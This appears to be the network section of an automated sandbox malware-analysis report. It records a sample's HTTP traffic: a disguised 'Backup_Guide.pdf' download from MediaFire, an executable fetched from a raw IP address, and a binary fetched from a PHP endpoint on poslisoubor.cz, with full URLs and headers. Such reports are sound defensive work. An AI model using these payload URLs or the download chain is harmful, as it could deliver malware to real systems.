Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.mediafire.com | 104.16.114.74 | |
download2268.mediafire.com | 199.91.155.9 | |
poslisoubor.cz | 109.71.208.62 | |
GET 302 https://www.mediafire.com/file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file
Request:
GET /file_premium/p3wr1k36iwfjl7y/Backup_Guide.pdf/file HTTP/1.1
Host: www.mediafire.com
Connection: Keep-Alive
Response:
HTTP/1.1 302 Found
Date: Wed, 31 Jul 2024 05:51:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://download2268.mediafire.com/qr8luj1fzd8g3bv6nW_vkbNN9U37OPJucvRpMXA0C6yRMV6EbEL93xnS6_bBqtWIJ1r_YIUyjbf885Lty7TTdZKxLPjY_47Esi_qASx-8jpkWh0DrFmCBI6QdOtIloYrqM3AbEKf2rsqaqQNWGiVZ07UGsUVojVAlKJAO1KmHndKPcM/p3wr1k36iwfjl7y/Backup_Guide.pdf
CF-Ray: 8abb50c7fb5e687d-NRT
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: https://www.mediafire.com
Set-Cookie: ukey=qmqtoe12nqclwar0cfa4c0q8ca6gldh7; expires=Sun, 31-Jul-2044 05:51:15 GMT; Max-Age=631152000; path=/; domain=.mediafire.com; HttpOnly
Strict-Transport-Security: max-age=0
access-control-allow-methods: OPTIONS, POST, GET
alt-svc: h3=":443"; ma=86400
x-mf-env: liveApi
x-mf-fe: mf1
Set-Cookie: __cf_bm=R6adTGw2Envba86_PzieY6y86L_1bCbvIjWFn10GDWs-1722405075-1.0.1.1-HGZjCYNlArNdUXeIR9qIPVh5qkFz6T2h5.sr52pdJ.3_fGcvF.rmT6QJpA3hF3AsTxpfCksn.ci1YBjHn.4JCg; path=/; expires=Wed, 31-Jul-24 06:21:15 GMT; domain=.mediafire.com; HttpOnly; Secure
Server: cloudflare
GET 200 http://94.154.172.166/rwrv/23.exe
Request:
GET /rwrv/23.exe HTTP/1.1
Host: 94.154.172.166
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 05:51:17 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Tue, 30 Jul 2024 13:22:09 GMT
ETag: "7000-61e76dd5ebed3"
Accept-Ranges: bytes
Content-Length: 28672
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET 200 http://poslisoubor.cz/gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txt
Request:
GET /gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: poslisoubor.cz
Response:
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 05:51:03 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/5.6.40-0+deb8u5
Content-Disposition: attachment; filename="9.txt"
Content-Transfer-Encoding: binary
Content-Length: 494592
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/download
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49164 -> 104.16.114.74:443 | C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Organization Validation Secure Server CA | C=US, ST=Texas, O=MEDIAFIRE, LLC, CN=*.mediafire.com | 8b:fa:81:04:17:18:84:c4:3e:8e:d5:89:ad:d6:5d:bd:9a:df:84:da |
Snort Alerts
No Snort Alerts